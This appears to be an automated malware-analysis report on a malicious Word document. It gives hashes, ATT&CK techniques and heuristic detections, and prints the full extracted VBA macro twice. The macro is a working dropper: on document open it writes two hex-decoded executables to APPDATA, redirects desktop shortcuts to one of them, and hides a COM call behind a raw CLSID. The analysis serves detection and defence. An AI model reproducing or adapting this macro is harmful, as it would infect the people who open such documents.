Office (OLE) malware analysis — malicious · eebc056d535f2b12

MALICIOUS

Office (OLE)

447.5 KB Created: 2018-12-04 12:55:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: aab23055f489b5c1feca97a763ef808d SHA-1: 31742b9b92d8a29540ddb96d3a5efd7f6ccbcdd4 SHA-256: eebc056d535f2b1278df043eee776595b6526e47a6cffdc67641c165b1f5e973

418 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that execute upon opening the document, leveraging WScript.Shell to create directories and write executables. The Document_Open macro attempts to create a directory named 'lkn' in the APPDATA folder and writes two files, 'werd.exe' and 'wird.exe', into it. It also appears to manipulate shortcut files on the desktop and potentially establish persistence. The ClamAV detection 'Doc.Dropper.Agent-6835541-0' further supports its malicious nature as a dropper.

Heuristics 12

ClamAV: Doc.Dropper.Agent-6835541-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6835541-0
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard

VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION

VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
Matched line in script
```
Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Option Explicit
Private Sub Document_Open()
On Error Resume Next
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
gdffs = Environ("APPDATA") & "\"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5181 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5181 bytes
SHA-256: `7c7edaeeb8c960f377ddaf9c475f0dd36d74b102f469d2f718e37072695ace76`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Private Sub Document_Open() On Error Resume Next Dim gdffs gdffs = Environ("APPDATA") & "\" If Dir(gdffs & "lkn", vbDirectory) = "" Then Open gdffs & "werd.exe" For Output As #1 Print #1, HexToString(UserForm1.TextBox1.text) Close #1 Open gdffs & "wird.exe" For Output As #1 Print #1, HexToString(UserForm2.TextBox1.text) Close #1 Call finds Else End If End Sub Sub finds() On Error Resume Next Dim strDirPath, strMaskSearch, strFileName As String Dim oWsh Set oWsh = CreateObject("WScript.Shell") strDirPath = oWsh.SpecialFolders("Desktop") strMaskSearch = ".lnk" Dim s As String, s2 As String s = Environ("APPDATA") & "\lkn" MkDir s Dim fso As Object Set fso = VBA.CreateObject("Scripting.FileSystemObject") Dim gdffs, iStr1 gdffs = Environ("APPDATA") iStr1 = Left(gdffs, 3) & "users\public\desktop" strFileName = Dir(iStr1 & "/" & strMaskSearch) Do While strFileName <> "" Call kk(iStr1 & "\" & strFileName, s & "\" & strFileName, strDirPath & "\" & strFileName) strFileName = Dir Loop strFileName = Dir(strDirPath & "/" & strMaskSearch) Do While strFileName <> "" FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("De" & "skt" & "op")) ' MsgBox strFileName strFileName = Dir Loop Selection.WholeStory Selection.Copy Selection.TypeBackspace ActiveDocument.Save ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Sub MakeShortcut(pod, gfdgd, jojj, hhhhh) Dim a, b, c, f, pos, pis, pas, pus, ppp, txt Selection.InsertFile FileName:=jojj, Range:="", _ ConfirmConversions:=False, Link:=False, Attachment:=False Selection.WholeStory Selection.Copy Selection.TypeBackspace txt = ClipboardText Dim sss, aaa, aaaa, ssss, aa, aas, aad ssss = InStr(1, txt, ":\") aaaa = InStr(ssss + 5, txt, ":\") aa = Mid(txt, aaaa - 1) aas = Left(aa, 100) sss = InStr(1, aas, ".e" & "xe") aad = Left(aa, sss + 3) Dim kkk, xxx, ccc, vvv, bbb, nnn kkk = InStr(sss - 20, aad, "\") xxx = InStr(kkk + 1, aad, "\") If xxx <> 0 Then ccc = Mid(aad, xxx + 1) Else ccc = Mid(aad, kkk + 1) End If Dim oWsh Dim myshortcut Dim oShortcut Dim strSplitFileName Dim strTarget Dim nShortName, strDirPath Set oWsh = CreateObject("WScript.Shell") strDirPath = oWsh.SpecialFolders("Desktop") Dim fsdf As String fsdf = Environ("APPDATA") & "\wird.exe" Dim shell As Shell32.shell Dim folder As Shell32.folder Dim folderItem As Shell32.folderItem Dim shortcut As Shell32.ShellLinkObject Set shell = New Shell32.shell Set folder = shell.NameSpace(strDirPath) If Not folder Is Nothing Then Set folderItem = folder.ParseName(pod) If Not folderItem Is Nothing Then Set shortcut = folderItem.GetLink If Not shortcut Is Nothing Then shortcut.Path = fsdf shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """" shortcut.SetIconLocation aad, 0 shortcut.Save End If End If End If Set oWsh = Nothing Set oShortcut = Nothing End Sub Function ClipboardText() With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}") .GetFromClipboard ClipboardText = .GetText End With End Function Public Function HexToString(ByVal HexToStr As String) As String Dim strTemp As String Dim strReturn As String Dim i As Long For i = 1 To Len(HexToStr) Step 2 strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2))) strReturn = strReturn & strTemp Next i HexToString = Right(strReturn, Len(strReturn)) End Function Sub kk(aa, bb, cc) FileCopy aa, bb Kill aa FileCopy bb, cc End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{2FE1C736-3596-4292-A45E-D40528CDDC22}{2FF996D0-DEC1-47D6-B492-1FE8A3AE7AA7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{FB712FD2-D570-45CF-830F-5C9E410D200F}{A03F4036-9292-435F-8C77-C316FF73F1E5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 7c7edaeeb8c960f377ddaf9c475f0dd36d74b102f469d2f718e37072695ace76

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
On Error Resume Next
Dim gdffs

gdffs = Environ("APPDATA") & "\"

 If Dir(gdffs & "lkn", vbDirectory) = "" Then
                Open gdffs & "werd.exe" For Output As #1
    Print #1, HexToString(UserForm1.TextBox1.text)
    Close #1
    
          Open gdffs & "wird.exe" For Output As #1
    Print #1, HexToString(UserForm2.TextBox1.text)
       Close #1
    Call finds
    Else

    End If
    
   
   End Sub


Sub finds()
On Error Resume Next
Dim strDirPath, strMaskSearch, strFileName As String
Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")
strMaskSearch = "*.lnk*"


Dim s As String, s2 As String

    s = Environ("APPDATA") & "\lkn"

      MkDir s

Dim fso As Object
Set fso = VBA.CreateObject("Scripting.FileSystemObject")




Dim gdffs, iStr1

gdffs = Environ("APPDATA")
 iStr1 = Left(gdffs, 3) & "users\public\desktop"
strFileName = Dir(iStr1 & "/" & strMaskSearch)

Do While strFileName <> ""

Call kk(iStr1 & "\" & strFileName, s & "\" & strFileName, strDirPath & "\" & strFileName)

    strFileName = Dir
Loop






strFileName = Dir(strDirPath & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName
Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("De" & "skt" & "op"))
  ' MsgBox strFileName

    strFileName = Dir
Loop
    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
  ActiveDocument.Save
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Sub MakeShortcut(pod, gfdgd, jojj, hhhhh)
Dim a, b, c, f, pos, pis, pas, pus, ppp, txt

Selection.InsertFile FileName:=jojj, Range:="", _
        ConfirmConversions:=False, Link:=False, Attachment:=False

    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
    txt = ClipboardText


   Dim sss, aaa, aaaa, ssss, aa, aas, aad
    
    ssss = InStr(1, txt, ":\")
    aaaa = InStr(ssss + 5, txt, ":\")
    aa = Mid(txt, aaaa - 1)
    aas = Left(aa, 100)
    sss = InStr(1, aas, ".e" & "xe")
    aad = Left(aa, sss + 3)


Dim kkk, xxx, ccc, vvv, bbb, nnn

kkk = InStr(sss - 20, aad, "\")

xxx = InStr(kkk + 1, aad, "\")


If xxx <> 0 Then
ccc = Mid(aad, xxx + 1)

Else
ccc = Mid(aad, kkk + 1)

End If

Dim oWsh
Dim myshortcut
Dim oShortcut
Dim strSplitFileName
Dim strTarget
Dim nShortName, strDirPath

Set oWsh = CreateObject("WScript.Shell")

strDirPath = oWsh.SpecialFolders("Desktop")


     Dim fsdf As String
     fsdf = Environ("APPDATA") & "\wird.exe"




   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
    Dim folderItem As Shell32.folderItem
    Dim shortcut As Shell32.ShellLinkObject
    
    Set shell = New Shell32.shell
    
    Set folder = shell.NameSpace(strDirPath)
    If Not folder Is Nothing Then
        Set folderItem = folder.ParseName(pod)
        If Not folderItem Is Nothing Then
            Set shortcut = folderItem.GetLink
            If Not shortcut Is Nothing Then
                shortcut.Path = fsdf
        
 

   shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """"
                shortcut.SetIconLocation aad, 0
                 shortcut.Save
            End If
        End If
    End If
    
    
    

Set oWsh = Nothing
Set oShortcut = Nothing




End Sub

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
        ClipboardText = .GetText
    End With
End Function


Public Function HexToString(ByVal HexToStr As String) As String

Dim strTemp   As String
Dim strReturn As String
Dim i As Long

For i = 1 To Len(HexToStr) Step 2
    strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
    strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function


Sub kk(aa, bb, cc)
FileCopy aa, bb
     Kill aa
FileCopy bb, cc

End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2FE1C736-3596-4292-A45E-D40528CDDC22}{2FF996D0-DEC1-47D6-B492-1FE8A3AE7AA7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{FB712FD2-D570-45CF-830F-5C9E410D200F}{A03F4036-9292-435F-8C77-C316FF73F1E5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.